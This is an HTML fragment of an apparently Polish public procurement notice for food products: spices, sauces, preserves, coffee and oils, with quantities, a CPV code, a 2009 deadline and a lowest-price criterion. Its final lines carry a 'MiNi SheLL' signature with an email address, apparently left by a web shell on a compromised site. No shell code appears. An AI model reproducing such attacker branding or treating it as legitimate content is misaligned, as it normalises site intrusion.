<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sos pieczeniowy  jasny (35g) szt	75 Sos pieczeniowy ciemny (35g) szt 75 Przyprawa w płynie Maggi (1 litr)	litr 30 Sos sojowy (200ml) szt 10 Papryka ostra (20g) szt 60 Papryka słodka (20g) szt 60 Kwasek cytrynowy (20g)	szt 40 Imbir (20g) szt 30 Gałka muszkatołowa mielona (15g) szt 80 Zioła prowansalskie (10g) szt 20 Płatki kukurydziane (500g) szt 40 Płatki migdałowe (60g) szt 20 Kotlety sojowe (100g) szt 10 Sól peklująca (1 kg) szt 35 Przyprawa do flaków (20g) szt 20 Przyprawa do grilla (20g)	szt 20 Wino półsłodkie białe (0,7l) szt 15 Wino półwytrawne białe (0,7l) szt 15 Dżem (300g) szt 50 Groszek konserwowy puszka (400g) szt 350 Żurawina (słoik 280g) szt 120 Seler konserwowy (słoik 400g) szt 100 Ananas plastry puszka (450g) szt	120 Majonez Winiary (0,9l) szt 60 Majonez Mosso (0,9l) szt 60 Sos sałatkowy winegret (9g) szt	500 Śliwka suszona (125g) szt 105 Morela suszona (130) szt	105 Żelatyna EMIX (50g) szt 800 Chrzan (słoik 200ml) szt 400 Ketchup Tortex (1 kg) szt 80 Musztarda (1kg)	szt 80 Koncentrat pomidorowy (słoik 1l)	szt 40 Ocet (1l) szt 40 Pieczarki marynowane (słoik 0,9l)	szt 280 Ogórek konserwowy (słoik 0,9l) szt 420 Papryka konserwowa (słoik 0,9l)	szt 350 Brzoskwinie w syropie (puszka 820g) szt 70 Pieprz mielony (20g) szt 180 Ziele angielskie (12g) szt	40 Majeranek (20g)	szt 180 Czosnek granulowany (20g) szt 40 Przyprawa Vegeta (1kg)	kg 53 Curry (20g) szt 20 Bułka tarta kg 120 Barszcz czerwony koncentrat (słoik 160g)	szt 100 Rosół z kury koncentrat (słoik 160g) szt 100 Żurek Winiary (45g) szt 400 Rodzynki (100g)	szt 210 Ryż  długoziarnisty kg 120 Makaron domow Babuni (250g)	kg 70
Makaron wstążka kg 30 Wafelki do lodów - miseczki szt 4200 Sos do lodów toffi, jagoda, truskawka (1,3kg) szt 30 Groch łuskany kg 20 Śmietana w sprayu (250ml) szt 90 Śmietanka do kawy (10g x 10szt)	szt 500 Mąka pszenna kg 210 Sól jodowana kg 175 Cukier kryształ kg 140 Miód naturalny (220g) szt 30 Kawa mielona (250g) szt 230 Kawa rozpuszczalna (200g) szt 110 Herbata Lepton ekspresowa (50 torebek)	szt 140 Napój gazowany (1 l) litr 400 Napoje niegazowane (1 l) litr 200 Soki owocowe w kartonie (2l) litr	200 Olej słonecznikowy (1 litr) szt 530 Masło extra (200g) szt 250 Margaryna zwykła (250g)	szt 180 Smalec kg 30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com